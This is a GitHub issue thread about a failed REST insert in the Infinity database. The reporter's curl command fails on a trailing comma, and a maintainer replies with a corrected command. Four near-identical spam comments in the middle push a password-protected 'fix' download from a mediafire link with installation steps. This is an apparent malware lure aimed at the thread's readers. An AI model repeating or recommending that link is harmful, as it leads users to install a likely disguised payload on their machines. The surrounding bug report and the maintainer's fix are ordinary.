### ISSUE TITLE
[Bug]: Can't insert data using REST

### ISSUE THREAD

**Issue by writinwaters** [infiniflow/infinity#1739]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Version or Commit ID

v0.3.0-dev6

### Actual behavior and How to reproduce it

```
curl --request POST \
     --url http://localhost:23820/databases/{database_name}/tables/{table_name}/docs \
     --header 'accept: application/json' \
     --header 'content-type: application/json' \
     --data ' \
[    
    {
        "name": "Tom",
        "score": 4.0
    },
    {
        "name": "Toby",
        "score": 5.0
    },
] '
```
```
{"error_code":3067,"error_message":"[json.exception.parse_error.101] parse error at line 10, column 2: syntax error while parsing value - unexpected ']'; expected '[', '{', or a literal"}
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JinHai-CN** [comment]
```
curl --request POST --url http://localhost:23820/databases/default_db/tables/table1/docs --header 'accept: application/json'  --header 'content-type: application/json' --data ' 
[    
    {
        "name": "Tom",
        "score": 95
    },
    {
        "name": "Jason",
        "score": 92
    }
] '
```
